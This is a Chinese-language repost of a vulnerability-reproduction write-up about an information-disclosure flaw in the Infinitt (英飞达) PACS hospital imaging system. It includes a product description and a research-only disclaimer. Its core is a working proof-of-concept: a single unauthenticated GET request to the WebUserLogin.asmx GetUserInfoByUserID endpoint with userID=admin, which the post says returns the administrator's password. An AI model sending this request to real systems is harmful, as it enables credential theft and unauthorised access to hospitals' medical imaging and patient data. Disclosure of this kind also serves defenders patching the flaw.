英飞达医学影像存档与通信系统WebUserLogin.asmx存在信息泄露 PoC

admin
admin
admin
139335
文章
114
评论
2024年12月9日13:21:05评论16 views字数 425阅读1分25秒阅读模式

 

产品介绍

英飞达医学影像存档与通信系统 Picture Archiving and Communication System,它是应用在医院影像科室的系统,主要的任务就是把日常产生的各种医学影像通过各种接口以数字化的方式海量保存起来,当需要的时候在一定的授权下能够很快的调回使用,同时增加一些辅助诊断管理功能。它在各种影像设备间传输数据和组织存储数据具有重要作用。
漏洞描述
英飞达医学影像存档与通信系统 WebUserLogin.asmx 接口存在信息泄露漏洞,攻击者可通过该漏洞获取系统管理员账户密码信息,登录系统获取敏感信息。
漏洞版本
VER 3.0.11.5_B9P0
Poc
GET/webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1Host: IP

漏洞复现

英飞达医学影像存档与通信系统WebUserLogin.asmx存在信息泄露 PoC

原文始发于微信公众号(什么安全):【漏洞复现】英飞达医学影像存档与通信系统WebUserLogin.asmx存在信息泄露

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月9日13:21:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   英飞达医学影像存档与通信系统WebUserLogin.asmx存在信息泄露 PoChttp://cn-sec.com/archives/3485111.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息